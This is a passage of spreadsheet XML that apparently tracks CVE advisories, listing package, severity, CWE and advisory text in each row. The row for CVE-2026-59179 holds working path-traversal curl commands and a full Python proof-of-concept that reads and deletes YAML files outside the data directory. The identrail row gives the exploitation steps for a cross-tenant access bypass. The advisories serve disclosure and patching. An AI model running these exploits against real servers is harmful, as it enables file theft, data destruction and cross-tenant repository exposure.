      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>pip:esphome-device-builder</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>1.0.10</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr"/>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="R34"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S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59177</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59179</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>npm:@openhop/server</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr">
        <is>
          <t>0.3.6</t>
        </is>
      </c>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr"/>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>## Path Traversal in Flow ID File Operations
### Summary
`@openhop/server` passes unsanitized HTTP route parameters directly to `path.join()` when constructing filesystem paths for flow YAML files. An unauthenticated attacker who can reach the server can read arbitrary `.yaml` files accessible to the OpenHop process outside the configured flow directory, and can delete arbitrary `.yaml` files at any path reachable by the process. Because CORS is set to `origin: true` (allow all origins), a victim's browser can be used to exploit the vulnerability against a loopback-bound instance. Docker deployments bind `HOST=0.0.0.0` by default, enabling direct remote exploitation. CVSS Base Score: **8.3 (High)**.
### Details
`FlowStore.filePath()` in `packages/server/src/store.ts:52–53` constructs a filesystem path by concatenating the caller-supplied `id` directly into `path.join`:
```ts
// packages/server/src/store.ts:52-53
private filePath(id: string): string {
  return join(this.dir, `${id}.yaml`)
}
```
This result is consumed by two sinks:
- **Read** (`packages/server/src/store.ts:78`): `readFile(this.filePath(id), 'utf-8')`
- **Delete** (`packages/server/src/store.ts:105`): `unlink(this.filePath(id))`
The `id` value originates from unauthenticated Fastify HTTP route parameters:
- `GET /api/flows/:id` (`packages/server/src/routes.ts:306`) → `store.get(id)` at line 333–335
- `DELETE /api/flows/:id` (`packages/server/src/routes.ts:509`) → `store.delete(id)` at line 539–541
The route parameter schema at `packages/server/src/routes.ts:315` and `519` declares only `type: 'string'` with no pattern constraint or allowlist. Fastify's underlying router (`find-my-way`) applies `decodeURIComponent` to route parameters, so the URL segment `..%2Fvictim` is decoded to `../victim` before it reaches application code. Node.js `path.join('/data/flows', '../victim.yaml')` then normalizes to `/data/victim.yaml`, escaping the configured data directory.
Additionally, `packages/server/src/index.ts:37` registers CORS with `origin: true`, permitting any browser origin to make cross-origin requests to the server. This makes the vulnerability exploitable via a malicious webpage against users running OpenHop locally.
**Full data-flow (read path):**
1. HTTP `GET /api/flows/..%2Fvictim` received (`routes.ts:306`)
2. `find-my-way` decodes `..%2Fvictim` → `req.params.id = '../victim'` (`routes.ts:333`)
3. `store.get('../victim')` → `filePath('../victim')` → `join('/data/flows', '../victim.yaml')` → `/data/victim.yaml` (`store.ts:52–53`)
4. `readFile('/data/victim.yaml', 'utf-8')` returns file contents (`store.ts:78`)
5. Server responds HTTP 200 with YAML-parsed JSON body
**Full data-flow (delete path):**
1. HTTP `DELETE /api/flows/..%2Fdelete-me` received (`routes.ts:509`)
2. `find-my-way` decodes `..%2Fdelete-me` → `req.params.id = '../delete-me'` (`routes.ts:539`)
3. `store.delete('../delete-me')` → `filePath('../delete-me')` → `join('/data/flows', '../delete-me.yaml')` → `/data/delete-me.yaml` (`store.ts:52–53`)
4. `unlink('/data/delete-me.yaml')` removes the file (`store.ts:105`)
5. Server responds HTTP 204
### PoC
**Environment setup (Docker):**
```bash
# Build from repository root
docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
# Run with HOST=0.0.0.0 (default in the Dockerfile ENV)
docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
```
The container creates `/data/flows/` as the configured flow store (`OPENHOP_DATA_DIR=/data/flows`) and places `/data/victim.yaml` and `/data/delete-me.yaml` outside that directory as traversal targets.
**Attack 1 — Read file outside flow store:**
```bash
curl -i --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fvictim'
```
Expected response:
```http
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
{"id":"victim","meta":{"title":"SECRET_OUTSIDE_FILE","description":"This file lives outside the configured flow store directory"},"flow":{"nodes":[{"id":"a","label":"Sensitive Data","type":"service"}]},"version":1,"createdAt":"2026-06-20T00:00:00.000Z","updatedAt":"2026-06-20T00:00:00.000Z"}
```
**Attack 2 — Delete file outside flow store:**
```bash
curl -i -X DELETE --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fdelete-me'
```
Expected response:
```http
HTTP/1.1 204 No Content
```
Verify deletion:
```bash
docker exec openhop-vuln-001 sh -c 'test -e /data/delete-me.yaml &amp;&amp; echo exists || echo deleted'
# Output: deleted
```
**Automated PoC script:**
```bash
python3 poc.py 127.0.0.1 8799
```
**Recommended fix:**
```diff
--- a/packages/server/src/store.ts
+++ b/packages/server/src/store.ts
+const FLOW_ID_PATTERN = /^[A-Za-z0-9_-]+$/
+
   private filePath(id: string): string {
+    if (!FLOW_ID_PATTERN.test(id)) {
+      throw new Error('Invalid flow id')
+    }
     return join(this.dir, `${id}.yaml`)
   }
```
### Impact
This is a **Path Traversal (CWE-22)** vulnerability. The `.yaml` file extension restriction limits confidentiality impact to YAML-format files (C:L), but the delete path allows permanent destruction of any `.yaml` file the process can reach (I:H, A:H).
**Affected parties:**
- **Users running `openhop serve` locally** — exploitable via a malicious webpage due to `cors({ origin: true })` allowing all browser origins to make cross-origin requests to `localhost:8799`.
- **Docker/server deployments** — `HOST=0.0.0.0` is set by default in the official Docker environment, making all three routes directly reachable from the network without authentication.
An attacker can: (1) read the contents of any `.yaml` file accessible to the OpenHop process, potentially leaking application secrets, configuration data, or other YAML-serialized data; (2) permanently delete any `.yaml` file accessible to the process, causing data loss or disruption of services that depend on those files.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
#
# Build context: the repository root (naorsabag/openhop)
# Usage:
#   docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
#   docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
#
# Data layout inside the container:
#   /data/flows/         &lt;- OPENHOP_DATA_DIR (the configured flow store)
#   /data/victim.yaml    &lt;- OUTSIDE the flow store (path traversal read target)
#   /data/delete-me.yaml &lt;- OUTSIDE the flow store (path traversal delete target)
#
# The exploit payload "..%2Fvictim" is URL-decoded by find-my-way to "../victim",
# so path.join('/data/flows', '../victim.yaml') resolves to /data/victim.yaml.
FROM node:22-alpine
WORKDIR /app
# Copy package manifests so npm can resolve workspace dependency graph.
COPY package*.json ./
COPY packages/server/package*.json packages/server/
COPY packages/shared/package*.json packages/shared/
COPY packages/cli/package*.json packages/cli/
COPY packages/web/package*.json packages/web/
# Copy TypeScript configs and source files BEFORE npm install.
# The @openhop/server package has a "prepare" lifecycle that runs
# `tsc &amp;&amp; esbuild` during npm install, so all sources must be present.
COPY tsconfig.base.json ./
COPY packages/server/tsconfig*.json packages/server/
COPY packages/server/src/ packages/server/src/
COPY packages/shared/src/ packages/shared/src/
# Install all workspace dependencies.
# The @openhop/server prepare script will compile to dist/server.js.
# We run the server via tsx (direct TypeScript), so the compiled output
# is not required at runtime but the prepare step must not fail.
RUN npm install
# Set up the data directory layout for the PoC.
#   /data/flows/       -&gt; configured as OPENHOP_DATA_DIR (the "safe" directory)
#   /data/victim.yaml  -&gt; outside the store; represents a sensitive file that
#                         MUST NOT be reachable via the API without sanitization
RUN mkdir -p /data/flows &amp;&amp; \
    printf 'id: victim\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: SECRET_OUTSIDE_FILE\n    description: This file lives outside the configured flow store directory\n  flow:\n    nodes:\n      - id: a\n        label: Sensitive Data\n' \
    &gt; /data/victim.yaml &amp;&amp; \
    printf 'id: delete-me\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: DELETE_TARGET_FILE\n  flow:\n    nodes:\n      - id: b\n        label: Delete Target\n' \
    &gt; /data/delete-me.yaml
# Server listens on 8799 inside the container.
EXPOSE 8799
# OPENHOP_DATA_DIR constrains the flow store to /data/flows/.
# HOST=0.0.0.0 makes the server reachable from outside the container.
ENV OPENHOP_DATA_DIR=/data/flows
ENV HOST=0.0.0.0
ENV PORT=8799
# Run the server via tsx (TypeScript runner; no compile step needed at runtime).
CMD ["npx", "tsx", "packages/server/src/index.ts"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
Target: @openhop/server 0.3.5 / openhop CLI 0.3.6
VULN-001 — CVSS 8.3 High
Vulnerability:
    FlowStore.filePath(id) at packages/server/src/store.ts:52 performs:
        return join(this.dir, `${id}.yaml`)
    with no sanitization on `id`. The route GET /api/flows/:id passes
    `req.params.id` (decoded by find-my-way via decodeURIComponent) directly
    to store.get(id), which calls filePath(). A payload of "..%2Fvictim" in
    the URL is decoded to "../victim", causing path.join to escape the
    configured data directory.
Attack Vectors:
    READ:   GET    /api/flows/..%2Fvictim    -&gt; reads  /data/victim.yaml
    DELETE: DELETE /api/flows/..%2Fdelete-me -&gt; deletes /data/delete-me.yaml
Both routes are unauthenticated (routes.ts:306, 509).
Usage:
    python3 poc.py [host] [port]
    python3 poc.py 127.0.0.1 8799
"""
import http.client
import json
import sys
import time
HOST = sys.argv[1] if len(sys.argv) &gt; 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) &gt; 2 else 8799
# URL-encoded payloads: %2F is a percent-encoded "/" character.
# find-my-way treats ".." and "%2F" together as a single path segment
# (no literal "/" split), then decodes the segment to "../victim".
TRAVERSAL_GET_PATH = "/api/flows/..%2Fvictim"
TRAVERSAL_DELETE_PATH = "/api/flows/..%2Fdelete-me"
def wait_for_server(host: str, port: int, timeout: int = 60) -&gt; bool:
    """Poll until the OpenHop server returns any response on /api/flows."""
    deadline = time.time() + timeout
    print(f"[*] Waiting for server at http://{host}:{port} ...")
    while time.time() &lt; deadline:
        try:
            conn = http.client.HTTPConnection(host, port, timeout=2)
            conn.request("GET", "/api/flows")
            r = conn.getresponse()
            r.read()
            conn.close()
            print(f"[+] Server ready (HTTP {r.status} on /api/flows)")
            return True
        except Exception:
            time.sleep(1)
    return False
def raw_http(method: str, host: str, port: int, path: str):
    """
    Send an HTTP request with the path exactly as given — no normalization.
    http.client does NOT percent-decode or normalize the path string, so
    '..%2F' reaches the server verbatim and Fastify's router decodes it.
    """
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body
def main() -&gt; int:
    print("=" * 62)
    print("VULN-001  Path Traversal in OpenHop Flow ID File Operations")
    print("=" * 62)
    print(f"[*] Target  : http://{HOST}:{PORT}")
    print(f"[*] Payload : ..%2F  (decoded by find-my-way to ../)")
    print(f"[*] Store   : /data/flows/   (OPENHOP_DATA_DIR)")
    print(f"[*] Outside : /data/victim.yaml  /data/delete-me.yaml")
    print()
    if not wait_for_server(HOST, PORT):
        print("[-] Server did not become ready within timeout. ABORT.")
        return 1
    print()
    passed_read = False
    passed_delete = False
    # ── Attack 1: Read a file outside the configured flow store ─────────
    print("[*] Attack 1 — READ path traversal")
    print(f"    Request : GET {TRAVERSAL_GET_PATH}")
    print(f"    Decoded : id = ../victim")
    print(f"    Resolves: path.join('/data/flows', '../victim.yaml')")
    print(f"            = /data/victim.yaml  (outside flow store)")
    status, body = raw_http("GET", HOST, PORT, TRAVERSAL_GET_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    print(f"    Body    : {body_text[:600]}")
    if status == 200:
        try:
            data = json.loads(body_text)
            title = data.get("meta", {}).get("title", "")
            if "SECRET_OUTSIDE_FILE" in title:
                print("[PASS] READ confirmed: HTTP 200 returned content of /data/victim.yaml")
                print(f"       Leaked title field = {title!r}")
                passed_read = True
            else:
                print(f"[WARN] HTTP 200 but unexpected title: {title!r}")
                print(f"       Full response: {data}")
                # Still count as read-traversal success if we got a valid flow back
                if "meta" in data or "flow" in data:
                    print("[PASS] READ confirmed: path traversal returned a flow from outside store")
                    passed_read = True
        except json.JSONDecodeError:
            print(f"[FAIL] HTTP 200 but response is not JSON: {body_text[:200]}")
    else:
        print(f"[FAIL] Expected HTTP 200, got {status}")
    print()
    # ── Attack 2: Delete a file outside the configured flow store ────────
    print("[*] Attack 2 — DELETE path traversal")
    print(f"    Request : DELETE {TRAVERSAL_DELETE_PATH}")
    print(f"    Decoded : id = ../delete-me")
    print(f"    Resolves: path.join('/data/flows', '../delete-me.yaml')")
    print(f"            = /data/delete-me.yaml  (outside flow store)")
    status, body = raw_http("DELETE", HOST, PORT, TRAVERSAL_DELETE_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    if body_text:
        print(f"    Body    : {body_text[:200]}")
    if status in (200, 204):
        print(f"[PASS] DELETE confirmed: HTTP {status} — /data/delete-me.yaml deleted outside store")
        passed_delete = True
    else:
        print(f"[FAIL] Expected HTTP 204, got {status}")
    # ── Summary ─────────────────────────────────────────────────────────
    print()
    print("=" * 62)
    if passed_read and passed_delete:
        print("[RESULT] PASS — Both read and delete path traversal exploited")
        return 0
    elif passed_read:
        print("[RESULT] PARTIAL — Read traversal confirmed, delete did not succeed")
        return 1
    else:
        print("[RESULT] FAIL — Exploit did not succeed")
        return 2
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59179</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59185</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>go:github.com/identrail/identrail</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr">
        <is>
          <t>1.0.2</t>
        </is>
      </c>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr"/>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>## Summary
identrail's GitHub App connection-completion endpoint binds a fully client-supplied `installation_id` to the caller's workspace without verifying that the installation belongs to, or was installed by, the workspace that initiated the connect flow. identrail then mints a GitHub App installation access token for the supplied `installation_id` using the app's own JWT, so an authenticated tenant can link any other identrail customer's GitHub App installation into their own workspace and read that victim organization's private repositories.
## Affected code (default-on path, no feature flag)
- Route: `internal/api/router.go:3590` — `POST /v1/workspaces/:workspace_id/projects/:project_id/github/connect/complete`. `installation_id` is read from the JSON body or the attacker-controlled `X-GitHub-Installation-ID` header (`router.go:3582-3588`).
- Service: `internal/api/github_connect.go:781` `CompleteGitHubConnection`. The `state` token IS rigorously bound to the caller's scope (`github_connect.go:818`: `if stateRecord.TenantID != scope.TenantID || stateRecord.WorkspaceID != project.WorkspaceID || stateRecord.ProjectID != project.ProjectID { ... }`), but the only check on `installation_id` is `request.InstallationID &lt;= 0` (`:794`). The raw client value is persisted as the workspace's connection (`:840`).
- Cross-tenant read primitive: `internal/connectors/github/repositories.go:39` `ListInstallationRepositories` → `internal/connectors/github/app.go:170` mints a token via `POST /app/installations/{installationId}/access_tokens` signed with the App JWT, succeeding for any installation where identrail's app is installed.
The feature-flagged V2 path `CompleteGitHubConnector` (`github_connect.go:447`, default off) shares the gap and is additionally weaker (matches pending connector by `state` value alone with no caller-scope re-check); a single fix should cover both.
## Intent proof
The code binds `state` to `{TenantID, WorkspaceID, ProjectID}` and re-verifies it at completion (`:818`), demonstrating it understands binding is required. The asymmetry — `state` bound, `installation_id` unbound — is the missed check.
## Exploitation
1. Attacker is any authenticated identrail tenant; they call `StartGitHubConnection` for their own workspace and receive a `state`.
2. Attacker calls the completion route with `{state: &lt;their state&gt;, installation_id: V}` where V is a victim org's identrail GitHub App installation id (installation ids are not secret — they appear in post-install redirect URLs, webhook payloads, the org's GitHub App settings, and are enumerable integers).
3. `CompleteGitHubConnection` accepts (state matches attacker scope), `ListInstallationRepositories(V)` mints a token for V and lists the victim org's private repos, and the connection is persisted under the attacker's workspace.
4. Attacker now reads the victim org's private repository inventory and can drive posture scans/repo reads via their own workspace.
Impact: cross-tenant disclosure of another customer organization's private GitHub repositories and metadata.
## Remediation
Bind `installation_id` with the same rigor as `state`: capture it from GitHub's signed post-install redirect (`setup_url`/`callback_url`) and pin it to the pending state at start time, and/or after minting verify the installation's `account` matches the org the initiating workspace is authorized for.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59185</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69304</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.AspNetCore.Server.IISIntegration</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr">
        <is>
          <t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t>
        </is>
      </c>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr"/>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69304 – ASP.NET Core Denial of Service Vulnerability
## Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core IIS out-of-process hosting and request decompression. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
The IIS Middleware for ASP.NET Core did not properly constrain decompression of certain types of request, leading to excess memory consumption and a Denial of Service.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/443
## CVSS Details
- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H`
- **Weakness:** CWE-409 (Improper Handling of Highly Compressed Data (Data Amplification))
## Affected Platforms
- **Platforms:** Windows / IIS out-of-process
- **Architectures:** All
## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below
### &lt;a name=".NET 11 RC1"&gt;&lt;/a&gt;.NET 11 RC1
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 11.0.0-preview.1, &lt; 11.0.0-rc.1 | 11.0.0-rc.1
### &lt;a name=".NET 10"&gt;&lt;/a&gt;.NET 10
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 10.0.0, &lt;= 10.0.11 | 10.0.12
### &lt;a name=".NET 9"&gt;&lt;/a&gt;.NET 9
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 9.0.0, &lt;= 9.0.19 | 9.0.20
### &lt;a name=".NET 8"&gt;&lt;/a&gt;.NET 8
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 8.0.0, &lt;= 8.0.30 | 8.0.31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[CVE-2026-69304](https://www.cve.org/CVERecord?id=CVE-2026-69304)
### Acknowledgements
محمد السيد عثمان محمود القصاص
Anonymous
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr"/>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69439 – .NET and Visual Studio Elevation of Privilege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parsing a Portable PDB file.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/438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[CVE-2026-69439](https://www.cve.org/CVERecord?id=CVE-2026-69439)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr"/>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69522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processing PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/439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Supported .NET Framework versions listed in the [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69522) are also affected. Install the September 2026 .NET Framework security update applicable to a project's Windows version.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.NET Framework users must install the September 2026 security update applicable to their Windows version.
2. If a developer's application references Microsoft.DiaSymReader.Native, update the package reference to version 18.9.0-beta1.26405.2 or later.
Once users have installed the updated runtime, SDK, Visual Studio, or package, they should restart their apps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[CVE-2026-69522](https://www.cve.org/CVERecord?id=CVE-2026-69522)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr"/>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-71328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Microsoft.DiaSymReader.Native can perform an out of bounds write while processing MSFZ PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/440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[CVE-2026-71328](https://www.cve.org/CVERecord?id=CVE-2026-71328)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
